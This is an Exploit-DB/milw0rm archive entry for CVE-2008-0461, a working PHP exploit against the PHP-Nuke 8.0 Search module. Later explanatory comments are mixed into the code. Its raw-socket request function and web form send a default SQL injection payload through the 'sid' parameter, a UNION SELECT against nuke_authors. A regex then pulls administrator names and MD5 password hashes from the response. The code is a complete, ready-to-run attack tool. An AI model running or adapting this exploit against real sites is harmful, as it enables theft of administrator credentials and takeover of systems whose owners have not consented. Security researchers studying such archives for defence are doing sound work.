PHP-Nuke <= 8.0 Final sid Remote SQL Injection Exploit

2008-01-22T00:00:00
ID EDB-ID:4965
Type exploitdb
Reporter RST/GHC
Modified 2008-01-22T00:00:00

Description

PHP-Nuke <= 8.0 Final (sid) Remote SQL Injection Exploit. CVE-2008-0461. Web application exploit for the PHP platform.

                                        
                                            &lt;?php
##########################################################
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# works best on version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##########################################################
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##########################################################

# Form-submit handler: runs only when this script is POSTed back to itself
# (the "Submit" button is defined in the form further down). On a plain GET
# nothing in this block executes and $result stays undefined.
if (isset($_POST['Submit'])){
# The CONCAT(...) string is handed over as $param, but sendit() never
# references $param, so the request body that actually goes on the wire is
# whatever arrived in $_POST['sql_text'].
$result=sendit('CONCAT("::",aid,"::",pwd,"::")');
# Scans the raw response for a "::<name>::<32 hex chars>::" marker.
# $ahash and $aname are assigned here but nothing else in this listing reads
# them; only $result is printed (DEBUG block at the bottom of the page).
if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
{$ahash = $matches[2]; $aname = $matches[1];}

}

# Sends one hand-built HTTP/1.0 request to the host named in the form and
# returns the complete raw response (status line, headers and body) as a string.
#
# $param  accepted but never referenced in this body; the request body is
#         $_POST['sql_text'] verbatim.
# Returns the raw response text. On a failed connect the script die()s instead
#         of returning.
#
# Every value below is taken straight from $_POST with no validation or CR/LF
# filtering, so the host, path and header values are sent exactly as typed.
# The Referer and User-Agent the target logs are therefore operator-chosen and
# carry no attribution value.
function sendit($param){
$prefix = $_POST['prefix'];   # read but not used anywhere in this function
$data = $_POST['sql_text'];   # becomes the request body unchanged
$host = $_POST['hostname'];
# Optional subdirectory, prefixed with '/'. NOTE(review): the request line
# below prefixes another '/', so the path is sent as "//dir/modules.php...".
$page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
$page .= '/modules.php?name=Search';
$method = $_POST['method'];   # "POST" or "GET" from the form's select
$ref_text = $_POST['ref_text'];
$user_agent = $_POST['user_agent'];
$result = '';
# Plain TCP to port 80 (no TLS), 50-second connect timeout.
$sock = fsockopen($host, 80, $errno, $errstr, 50);
if (!$sock) die("$errstr ($errno)\n");   # aborts the whole script, no return
# The body and Content-type are written regardless of $method.
fputs($sock, "$method /$page HTTP/1.0\r\n");
fputs($sock, "Host: $host" . "\r\n");
fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
# Declared length covers $data only; the CRLF pairs written after the body
# below fall outside it.
fputs($sock, "Content-length: " . strlen($data) . "\r\n");
fputs($sock, "Referer: $ref_text". "\r\n");
fputs($sock, "User-Agent: $user_agent" . "\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "\r\n");
fputs($sock, "$data\r\n");
fputs($sock, "\r\n");

# HTTP/1.0 without keep-alive: read until the server closes the connection.
while (!feof($sock)) {
$result .= fgets ($sock,8192);
}
fclose($sock);
return $result;

}


?&gt;

&lt;head&gt;
&lt;meta http-equiv=Content-Type content="text/html; charset=windows-1251"&gt;
&lt;TITLE&gt;RST/GHC PHP Nuk'em exploit&lt;/TITLE&gt;
&lt;style&gt;
a:link{color: #000000; text-decoration: none;}
a:visited{color: #000000; text-decoration: none;}
a:hover,a:active{color:#e49a34; text-decoration:underline;}
table{color:#000000;font-family:verdana;font-size:8pt;}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {color: #E39930}
.style5 {color: #000000; font-weight: bold; }
&lt;/style&gt;
&lt;body bgcolor="#525254"&gt;
&lt;form method=post&gt;
&lt;!-- Every field below is echoed back into a value="" attribute through
     &lt;?= ... ?&gt; without htmlspecialchars(); a submitted value containing a
     double quote lands in the markup unescaped. The echoes need
     htmlspecialchars($v, ENT_QUOTES) before being placed in the attribute. --&gt;
&lt;p class="style2"&gt;&lt;font size="3" face="Arial, Helvetica, sans-serif"&gt;PHP Nuke &lt;span class="style3"&gt;QUERY MANIPULATOR&lt;/span&gt; based on &lt;font size="3" face="Arial, Helvetica, sans-serif"&gt;`sid` POST sql injection&lt;/font&gt; exploit for Search module &lt;/font&gt;&lt;/p&gt;
&lt;table width="900" border="0"&gt;
&lt;tr bgcolor="#FFFFFF"&gt;
&lt;td width="12%"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;Parameter&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td width="88%" bgcolor="#FFFFFF"&gt;&lt;span class="style5"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Value&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;url
&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input name="hostname" type="text" id="hostname" value="&lt;?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?&gt;"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;dir&lt;/font&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input name="dir" type="text" id="dir" value="&lt;?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?&gt;"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;referer&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input type="text" name="ref_text" value="&lt;?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?&gt;" size="60"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;SQL query&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;!-- This default is sent verbatim as the POST body by sendit(); it is the
     string (a quote followed by /**/UNION SELECT against nuke_authors inside
     the sid parameter) that a web log or WAF review of the Search module
     would see. --&gt;
&lt;input type="text" name="sql_text" value="&lt;?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?&gt;" size="80"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;user
agent&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input type="text" name="user_agent" value="&lt;?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?&gt;" size="60"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;table prefix &lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;!-- "prefix" is read into $prefix by sendit() but never used there. --&gt;
&lt;input name="prefix" type="text" id="prefix" value="&lt;?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?&gt;"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;method&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;select name="method" size="1" id="method"&gt;
&lt;option value="POST"&gt;POST&lt;/option&gt;
&lt;option value="GET"&gt;GET&lt;/option&gt;
&lt;/select&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&nbsp;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;
&lt;input type="submit" name="Submit" value="rock-n-roll"&gt;
&lt;/p&gt;
&lt;/form&gt;




&lt;font size="2"&gt;(c) RST/GHC&lt;/font&gt;

&lt;hr size="3"&gt;
&lt;?
# DEBUG
# $result is only set by the submit handler at the top of the file; on a first
# GET this prints an undefined variable. The target's raw response -- headers
# and body -- is written into the page unescaped, so any markup it contains is
# rendered by the operator's browser instead of being shown as text.
# (Short open tag "<?" above: depends on short_open_tag being enabled.)

print $result;
?&gt;

# milw0rm.com [2008-01-22]